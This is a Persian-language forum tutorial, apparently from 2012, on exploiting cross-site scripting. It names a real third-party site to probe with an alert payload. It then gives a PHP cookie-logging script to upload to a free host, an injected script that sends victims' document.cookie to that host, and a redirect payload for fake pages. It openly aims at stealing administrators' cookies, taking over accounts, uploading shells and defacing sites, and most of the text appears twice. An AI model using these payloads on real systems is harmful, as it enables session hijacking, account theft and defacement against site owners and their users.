01-22-2012، 08:14 PM
(آخرین تغییر در ارسال: 01-23-2012، 06:10 PM توسط Amin_Mansouri.)
خوب توضیحاتی دادیم در مورد این باگ بدم من به روش اسان همیشه مطالبم رو اموزش میدهم .
خوب باید باید بگیریم اول بفهمیم سایت باگ xss داره یا نداره !
یادتون باشه یاید مدیر سایت انلاین باشه مثلا توی نظرات یک وب سایت باگ xss داره وقتی کدمون رو تزریق میکنیم باید مدیر سایت صفحه رو باز کنه وقتی که باز کنه اون موقع کد ما اجرا میشه و میتونیم دستورات رو اجرا کنیم .
یادتون باشه وقتی مرورگر مدیر سایت صفحه ای که کدهای xss رو تزریق کردیم رو باز میکنه کدهای ما اجرا شده توجه کنید کدهاتون روی سیستم مدیر سایت یا کاربرقربانی اجرا میشه و ربطی به سرور نداره
وقتی کوکی رو بزنیم میتونیم یوزر و پسوورد طرف رو بزنیم و حتی شل اپلود کنیم و کلا دیفیس کنیم.
برای پیدا کردن سایت های که باگ xss دارن نیاز به درک یا اسکنر یا به صورت دستی تست کردن داریم .
من فعلا یک درک میزارم بعد درک های بیشتری قرار میدهیم.
درک xss
راه بعدی استفاده از اسکنر Acunetix Web Vulnerability Scanner سایت رو بدید اسکن کنه در صورت پیدا کردن پیغام Cross Site Scripting رو دیدید بدونید که باگ xss داره و نقطه ضعف داره !
حالا یه تست xss میکنیم سایت زیر رو باز کنید .
http://www.lifepages.org/comm/search1.asp
در قسمت سرچ برای کشف اسیب پذیری xss در قسمت سرچ عبارت زیر رو تایپ کنید :
اگر در قسمت سرچ باگ xss باشه پیغام xss bug find b parsicoders رو میبینید.
روی تصویر زیر کلیک کنید تا بهتر متوجه بشید :
![[عکس: tzpz6jra8rg0m3n5nq_thumb.jpg]](http://up.vatandownload.com/images/tzpz6jra8rg0m3n5nq_thumb.jpg)
توجه کنید باید xss در کامنت یا جایی باشه که مدی سایت ببینه بعد از پیدا کردن تارگت میخواهیم کوکیش رو بزنیم چطوری کوکی رو بزنیم ؟
اول برید توی سایت x10hosting.com یه هاست فری برای خودتون درست کنید.
کد زیر رو داخل notepad وارد کنید و به اسم iran.php ذخیره کنید.
کد :
بعد از ذخیره داخل هاست که اکانت ساختید اپلود کنید یا در هاست رایگان gigfa.com هم میشه
تازه وارد ها (فایل باید داخل پوشه Public_Html ) باشه
حالا کد زیر رو تزریق میکنیم
حالا جای siteshoma.com ادرس سایت خودتون رو بدید اگر به فرض در قسمت نظرات همچین باگی باشه هر کاربری کلیک کرد نظرات رو ببینه از ادمین تا کاربرها همه کوکیهاشون در هاستتون کنار فایلی که اپلود کردید یه فایل به اسم parsicoders.log ایجاد میشه
اگر بخواهیم مدیر سایت یا کاربرانش رو به سایت دیگری هدایت کنیم به روش زیر عمل میکنیم (بدرد fake page ) هم میخوره
به کد زیر توجه کنید :
Redirect to www.parsicoders.com
.... ادامه دارد
خوب باید باید بگیریم اول بفهمیم سایت باگ xss داره یا نداره !
یادتون باشه یاید مدیر سایت انلاین باشه مثلا توی نظرات یک وب سایت باگ xss داره وقتی کدمون رو تزریق میکنیم باید مدیر سایت صفحه رو باز کنه وقتی که باز کنه اون موقع کد ما اجرا میشه و میتونیم دستورات رو اجرا کنیم .
یادتون باشه وقتی مرورگر مدیر سایت صفحه ای که کدهای xss رو تزریق کردیم رو باز میکنه کدهای ما اجرا شده توجه کنید کدهاتون روی سیستم مدیر سایت یا کاربرقربانی اجرا میشه و ربطی به سرور نداره
وقتی کوکی رو بزنیم میتونیم یوزر و پسوورد طرف رو بزنیم و حتی شل اپلود کنیم و کلا دیفیس کنیم.
برای پیدا کردن سایت های که باگ xss دارن نیاز به درک یا اسکنر یا به صورت دستی تست کردن داریم .
من فعلا یک درک میزارم بعد درک های بیشتری قرار میدهیم.
درک xss
کد:
"search?q=" or "search.php?q=حالا یه تست xss میکنیم سایت زیر رو باز کنید .
http://www.lifepages.org/comm/search1.asp
در قسمت سرچ برای کشف اسیب پذیری xss در قسمت سرچ عبارت زیر رو تایپ کنید :
کد:
<script>alert("xss bug find by parsicoders")</script>روی تصویر زیر کلیک کنید تا بهتر متوجه بشید :
![[عکس: tzpz6jra8rg0m3n5nq_thumb.jpg]](http://up.vatandownload.com/viewer.php?file=tzpz6jra8rg0m3n5nq.jpg)
توجه کنید باید xss در کامنت یا جایی باشه که مدی سایت ببینه بعد از پیدا کردن تارگت میخواهیم کوکیش رو بزنیم چطوری کوکی رو بزنیم ؟
اول برید توی سایت x10hosting.com یه هاست فری برای خودتون درست کنید.
کد زیر رو داخل notepad وارد کنید و به اسم iran.php ذخیره کنید.
کد :
کد:
<?php
$cookie = $_GET['cookie'];
$log = fopen("parsicoders.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>بعد از ذخیره داخل هاست که اکانت ساختید اپلود کنید یا در هاست رایگان gigfa.com هم میشه
تازه وارد ها (فایل باید داخل پوشه Public_Html ) باشه
حالا کد زیر رو تزریق میکنیم
کد:
<script>document.location="http://www.siteshoma.com/iran.php?cookie=" + document.cookie;</script>حالا جای siteshoma.com ادرس سایت خودتون رو بدید اگر به فرض در قسمت نظرات همچین باگی باشه هر کاربری کلیک کرد نظرات رو ببینه از ادمین تا کاربرها همه کوکیهاشون در هاستتون کنار فایلی که اپلود کردید یه فایل به اسم parsicoders.log ایجاد میشه
اگر بخواهیم مدیر سایت یا کاربرانش رو به سایت دیگری هدایت کنیم به روش زیر عمل میکنیم (بدرد fake page ) هم میخوره
به کد زیر توجه کنید :
Redirect to www.parsicoders.com
کد:
<script>window.location="http://parsicoders.com/index.php";</script>
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg